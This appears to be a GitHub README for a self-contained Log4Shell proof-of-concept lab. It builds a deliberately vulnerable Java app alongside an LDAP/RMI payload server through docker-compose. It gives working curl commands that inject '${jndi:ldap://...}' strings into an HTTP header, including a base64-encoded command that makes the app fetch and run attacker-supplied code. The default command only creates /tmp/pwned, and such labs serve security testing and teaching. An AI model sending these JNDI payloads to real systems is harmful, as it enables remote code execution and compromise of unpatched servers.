Skip to content

Latest commit

 

History

History
35 lines (24 loc) · 759 Bytes

File metadata and controls

35 lines (24 loc) · 759 Bytes

log4shell POC

Steps

  1. Build the images
docker-compose build
  1. config the command in .env, default is touch /tmp/pwned

  2. Compose!

docker-compose up -d
  1. The vuluerable app is up and the 8080 port is binded on the host machine. To get the ldap payload, please see the log of the container rmi-server.

get_payload

and make a request, e.g.

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://rmi-server:1389/7mqfuh}'

Or use jndi-exploit to send the payload, e.g.

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://jndi-exploit:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
  1. Check the result, go to the console of the app.

result